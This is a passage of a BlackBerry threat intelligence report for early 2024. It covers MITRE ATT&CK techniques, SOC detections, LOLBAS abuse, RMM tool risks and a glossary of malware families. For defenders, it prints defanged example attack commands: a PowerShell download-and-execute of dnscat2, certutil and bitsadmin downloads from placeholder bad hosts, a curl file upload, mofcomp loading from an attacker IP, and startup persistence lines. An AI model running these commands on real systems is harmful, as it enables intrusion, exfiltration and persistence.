This is a sophisticated cyberthreat tactic employed by attackers to disguise their activities and evade detection. For instance, by using a false name, icon and metadata, harmful actions can be easily disguised as standard system operations. Masquerading as a legitimate file or process can trick users and security software into opening or saving a fake file, which can lead to system penetration and data loss. (Find details on identifying a masquerading method in our CylanceMDR Observations section of this report.)
Here is a breakdown of common masquerading methods:
- Renaming Executables: Attackers often rename malicious executables to pretend they are a legitimate system program (e.g., svchost.exe, explorer.exe) and may change or add another fake extension to hide the real file type, such as .txt.doc or .exe.config. The goal is to trick users and security tools when running manual or automatic system checks, so the user will run or try to open the malicious file without heeding any system warnings.
- Mimicking File Paths: In a commonly trusted directory (ex: System32), there is less observation and detection from security tools. For that reason, attackers often place malicious files in these directories and give them legitimate process names to conceal them.
- Invalid Code Signature: Attackers may sign their malware with invalid or stolen digital certificates to bypass security measures. This misleads systems and users into trusting malicious files or processes by making them appear as if they are verified by a legitimate source. Attackers may use expired, revoked or fraudulently obtained certificates. Identifying such tactics requires robust certificate validation processes and alert systems that can flag unusual certificate data or failed validations. For example, to masquerade cmd.exe as a calculator app:
Copy c:\windows\system32\cmd.exe C:\calc.exe
-
File and Directory Discovery – T1083
File and Directory Discovery is frequently utilized during an attacker’s reconnaissance stage to gain insight into the target environment, identify potential files for exfiltration or manipulation, locate sensitive information or support further stages of an attack chain.
The following are command lines used for this technique:
- ‘dir /s C:\path\to\directory’ – Utilizes the dir utility to recursively list files and directories in a certain directory and its subdirectories.
- ‘tree /F’ – Uses the tree utility to display file names in each directory along with the directory tree.
- ‘powershell.exe -c "Get-ChildItem C:\path\to\directory"’ – Implements the Get-ChildItem cmdlet in powershell, which retrieves a list of files and directories in the specified path.
Threat actors may also use native Windows API functions to enumerate files and directories. The following are Windows API functions used by threat actors:
- FindFirstFile – Retrieves information about the first file or directory that matches the specified file name or directory name pattern.
- FindNextFile – Continues a file search initiated by a previous call to the FindFirstFile function.
- PathFileExists – Verifies whether a specified directory or file exists.
-
Application Layer Protocol – T1071
Threat actors are constantly seeking new ways to conceal their actions within legitimate traffic to avoid detection. Application layer protocol manipulation (T1071) is a popular technique. During the first three months of 2024, this technique emerged as one of the top five tactics employed by malicious actors. By exploiting vulnerabilities in commonly used network protocols such as HTTP, HTTPS, DNS or SMB, adversaries can blend malicious activity seamlessly into routine network traffic.
This technique can be used to exfiltrate data, enable C2 communication, and move laterally within compromised networks. For instance, adversaries may encode sensitive data within HTTP headers or leverage DNS tunneling to bypass network defenses and extract information without raising suspicion. The stealthy nature of application layer protocol manipulation poses significant challenges to detection and attribution, as many traditional security tools struggle to differentiate between normal and malicious network activity.
Given the prevalence and sophistication of this technique, organizations must adopt proactive measures to bolster their defenses. A robust network monitoring solution must be capable of detecting anomalous traffic patterns and ensuring that suspicious behavior associated with application layer protocol manipulation is accurately differentiated from routine user activity.
Furthermore, maintaining up-to-date security patches for network protocols and applications can mitigate known vulnerabilities and exploits. By implementing endpoint detection and response (EDR) solutions, organizations can enhance their ability to identify and respond to malicious activities perpetrated through application layer protocol manipulation, thereby bolstering their overall cybersecurity posture.
The following are APL commands used by threat actors: curl -F "file=@C:\Users\tester\Desktop\test[.]txt 127[.]0[.]0[.]1/file/upload
powershell IEX (New-Object System.Net.Webclient).DownloadString('hxxps://raw[.]git hubusercontent[.]com/lukebaggett/dnscat2-powershell/master/dnscat2[.]ps1' -
Registry Run Keys / Startup Folder – T1547.001
Registry Run Keys / Startup Folder manipulation is a technique used by adversaries to establish persistence on compromised systems. This technique featured prominently among the top tactics utilized by cyberthreat actors in this reporting period. By tampering with Windows Registry keys or adding malicious entries to startup folders, adversaries ensure that their malicious payloads execute automatically upon system boot-up or user login, facilitating ongoing control over compromised systems.
This technique enables adversaries to deploy a wide range of malware, including backdoors, keyloggers and ransomware, thereby maintaining persistent access to compromised systems. Adversaries exploit native functionalities of Windows to evade detection. The abuse of legitimate system configurations makes detection and mitigation of these threats more challenging for traditional AV solutions.
To counter the threat posed by manipulation of registry run keys and startup folders, organizations must adopt a multi-layered approach to endpoint security:
- Regularly monitor and audit Windows Registry keys and startup folders to detect unauthorized changes indicative of malicious activity.
- Implement application whitelisting to help prevent unauthorized executables.
- Set privilege management controls to restrict adversaries’ ability to manipulate critical system configurations.
- Conduct user education and awareness programs to empower employees to recognize and report suspicious startup items or registry modifications.
- Enhance overall threat detection and response capabilities.
Some commands to be vigilant about include:
REG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders" /v Test /t REG_SZ /d "Test McTesterson"
echo "" > "%APPDATA%\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\file[.]txt"
CylanceMDR Data
This section of the report highlights several of the most common threat detections observed in CylanceMDR customer environments.
CylanceMDR, formerly known as CylanceGUARD®, is a subscription-based managed detection and response (MDR) service by BlackBerry that provides 24x7 monitoring and helps organizations stop sophisticated cyberthreats exploiting gaps in the customer’s security programs. The CylanceMDR team tracked thousands of alerts over this reporting period. Below, we break down the telemetry by region to provide additional insight into the current threat landscape.
CylanceMDR Observations
This reporting period, the CylanceMDR team observed that Certutil drove a lot of detection activity within the security operations center (SOC), namely, the technique related to renaming tools such as Certutil (e.g.: ‘Possible Certutil Renamed Execution’). There was a spike of detections related to this across all geographical regions where BlackBerry protects customers.
In our previous report, we discussed how living-off-the-land binaries and scripts (LOLBAS) utilities such as Certutil are abused or misused by threat actors: they often rename legitimate utilities (such as Certutil) in an attempt to evade detection capabilities. This is known as masquerading and has the MITRE Technique ID: T1036.003. Defenders must deploy robust detection capabilities to minimize the risk of evasion techniques such as masquerading. For example, creating a detection rule that only triggers when it sees the command Certutil (along with any options/arguments seen abused with this tool) can easily be evaded.
Take the two commands below, for example:
certutil.exe -urlcache -split -f "hxxps://bbtest/badFile[.]txt" bad[.]txt
If your detection capabilities only rely on seeing the command certutil (along with its options), this will be detected, but considered a weak protection as it could easily be evaded.
outlook.exe -urlcache -split -f "hxxps://bbtest/badFile[.]txt" bad[.]txt
In this case, we have renamed certutil.exe to outlook.exe and this would completely evade the detection (if using the logic discussed above).
A better solution would be to ensure that portable executable (PE) file/process metadata such as the original file name (the internal file name provided at compile time) is collected and integrated into the detection capabilities. A mismatch between the file name on disk and the binary’s PE metadata is a good indicator that a binary was renamed after compile time.
LOLBAS Activity
During this reporting period, we noted a change in the LOLBAS activity seen within our customer environments:
- Increase in detections related to regsvr32.exe.
- Decrease in mshta.exe-related activity.
- A high increase in detections related to bitsadmin.exe.
Below illustrates an example of malicious LOLBAS usage (excluding those that were shared during the last reporting period).
File: Bitsadmin.exe
Mitre: T1197 | T1105
How it can be abused:
- Download/upload from or to malicious host (Ingress tool transfer)
- Can be used to execute malicious process
Example Command:
bitsadmin /transfer defaultjob1 /download hxxp://baddomain[.]com/bbtest/bbtest C:\Users\<user>\AppData\Local\Temp\bbtest
File: mofcomp.exe
Mitre: T1218
How it can be abused:
- Can be used to install malicious managed object format (MOF) scripts
- MOF statements are parsed by mofcomp.exe utility and will add the classes and class instances defined in the file to the WMI repository
Example Command:
mofcomp.exe \\<AttackkerIP>\content\BBwmi[.]mof
Remote monitoring and management (RMM) tools are frequently used by managed IT service providers (MSPs) to remotely monitor clients’ endpoints. Unfortunately, RMM tools also allow threat actors to access those same systems. These tools provide a slew of administration features and provide a way for the threat actor to blend in by using trusted and approved tools.
In 2023, RMM tool abuse was a focal point due to reports related to Scattered Spider, a cyberattack group thought to be behind the MGM Resorts International attacks in September 2023. Members of Scattered Spider are considered sophisticated social engineering experts and deploy various techniques such as SIM swap attacks, phishing and push bombing. They have used a range of RMM tools during their attacks such as:
- Splashtop
- TeamViewer
- ScreenConnect
As of the first reporting period in 2024, the attention on RMM tooling has remained high since the discovery of two vulnerabilities in ConnectWise ScreenConnect (all versions below 23.9.8). CVE details can be seen below:
CVE-2024-1709
CWE-288: Authentication bypass using an alternate path or channel.
CVE-2024-1708
CWE-22: Improper limitation of a pathname to a restricted directory (“path traversal”).
The graph below illustrates the most common RMM tools observed during this reporting period.
During our analysis, we noted that many customers use multiple RMM tools, increasing the organization’s attack surface and risk. Suggested mitigations include:
Audit Remote Access Tools (RMM Tools)
- Identify currently used RMM tools within the environment.
- Confirm they are approved within the environment.
- If using multiple RMM tools, determine if they can be consolidated. Reducing the number of different tools used reduces the risk.
Disable Ports and Protocols
- Block inbound and outbound network communication to commonly used ports associated with non-approved remote access tools.
Routinely Audit Logs
- Detect abnormal use of remote access tools.
Patching
- Ensure regular review of vulnerabilities associated with RMM tools used, updating as necessary.
- Internet accessible software such as RMM tools should always be a high priority when doing regular patch cycles.
Network Segmentation
- Minimize lateral movement by segmenting the network, limiting access to devices and data.
Device Tagging
- Find out if your security vendor provides options to tag devices that use RMM tools. If so, enable this to ensure the SOC has visibility. Some vendors provide options to leave a note/tag identifying approved tools/activities, which greatly helps analysts during investigations.
Memory-Loading RMM
- Use security software that can detect remote access that are only loaded in memory.
Conclusion
This 90-day report is designed to help you stay knowledgeable and prepared for future threats. When dealing with a rapidly shifting cybersecurity threat landscape, it’s helpful to stay current with the latest security news for your industry, geographic region and key issues. Here are our main takeaways for January through March 2024:
- Globally, BlackBerry stopped 37,000 attacks per day directed at our tenants, according to our internal Attacks Stopped telemetry. We noted a large increase in unique malware targeting our tenants and customers, up 40 percent per minute over the previous reporting period. This could suggest that threat actors are taking extensive measures to carefully target their victims.
- Infostealers were prominent in our Critical Infrastructure, Commercial Enterprise, and Top Threats sections. This suggests that sensitive and private data are highly sought by threat actors across all geographic regions and industries.
- As highlighted in our new Ransomware Section that describes the most notable ransomware groups, ransomware is increasingly targeting critical infrastructure, particularly healthcare.
- CVE exploitation has rapidly expanded in the last year and will continue. BlackBerry recorded nearly 9,000 new CVEs disclosed by NIST in the last three months. Additionally, over 56 percent of these disclosed vulnerabilities scored over 7.0 in criticality. Exploits related to heavily utilized legitimate software such as ConnectWise ScreenConnect, GoAnywhere and multiple genuine Ivanti products have been weaponized by threat actors at an alarming rate to deliver a whole host of malware to unpatched victim machines.
- Political deceptions through deepfakes and misinformation are increasingly spreading via social media and will continue to be a problem in the future, particularly related to the Russian invasion of Ukraine, the unfolding Middle East conflict, and the upcoming U.S. presidential election taking place in November.
More information on the top cybersecurity threats and defenses can be found in the BlackBerry blog.
Acknowledgements
This report represents the collaborative efforts of our talented teams and individuals. In particular, we would like to recognize:
Appendix: Critical Infrastructure and Commercial Enterprise Threats
8Base ransomware: A particularly aggressive ransomware group first seen in 2023. It has been extremely active in its short history, often targeting victims in North America and LATAM countries. The threat group leverages a mix of tactics to achieve initial access, then may also exploit vulnerabilities in the victim’s systems to maximize their potential payout.
Amadey (Amadey Bot): Multifunctional botnet that has a modular design. Once it lands on a victim’s device, Amadey can receive commands from its C2 servers to execute various tasks, namely stealing information and deploying additional payloads.
Buhti: A relatively new ransomware operation, Buhti utilizes variants of the leaked LockBit 3.0 (a.k.a. LockBit Black) and Babuk ransomware families to attack Windows and Linux systems. In addition, Buhti has been known to use a custom data exfiltration utility written in the “Go” programming language designed to steal files with specific extensions. The ransomware operators have also already been seen swiftly exploiting other severe bugs impacting IBM's Aspera Faspex file exchange application (CVE-2022-47986) and the recently patched PaperCut vulnerability (CVE-2023-27350).
LummaStealer (LummaC2): C-based infostealer that targets commercial enterprise and critical infrastructure organizations, focusing on exfiltrating private and sensitive data from the victim device. Often promoted and distributed via underground forums and Telegram groups, this infostealer often relies on Trojans and spam to propagate.
PrivateLoader: A notorious downloader family that has been in the wild since 2021, targeting primarily commercial enterprises in North America. PrivateLoader (as its name implies) is an initial access mechanism, facilitating the deployment of a plethora of malicious payloads onto victim devices, namely infostealers. PrivateLoader operates a distribution network via an underground pay-per-install (PPI) service to finance its continued usage and development.
RaccoonStealer: MaaS infostealer. In the wild since 2019, the makers of RaccoonStealer have enhanced its abilities to avoid security software and traditional AV software. According to BlackBerry’s internal telemetry, RaccoonStealer has been observed targeting commercial enterprises in North America.
RedLine (RedLine Stealer): A widely distributed malware infostealer often sold via MaaS. The main motive of the threat group that distributes the malware appears to be mainly financial gain rather than politics, destruction or espionage. This is why RedLine has actively targeted a range of industries and geographic regions.
Remcos (RemcosRAT): A commercial-grade RAT used to remotely control a computer or device. Though advertised as legitimate software, the remote control and surveillance software was often used as a remote access Trojan.
SmokeLoader: A commonly utilized malware with a plethora of capabilities, namely the deployment of other malware onto a victim’s device. SmokeLoader has been a recurring threat observed by BlackBerry through multiple Global Threat Intelligence Reports. This reporting period, the malware was seen targeting commercial and professional services within North America.
Vidar (VidarStealer): A commodity infostealer that has been in the wild since 2018 and has developed into a heavily weaponized malware family. Attackers have been able to deploy Vidar by exploiting vulnerabilities in the popular ScreenConnect RRM software by ConnectWise. These two CVEs, CVE-2024-1708 and CVE-2024-1709, enabled threat actors to bypass and access critical systems.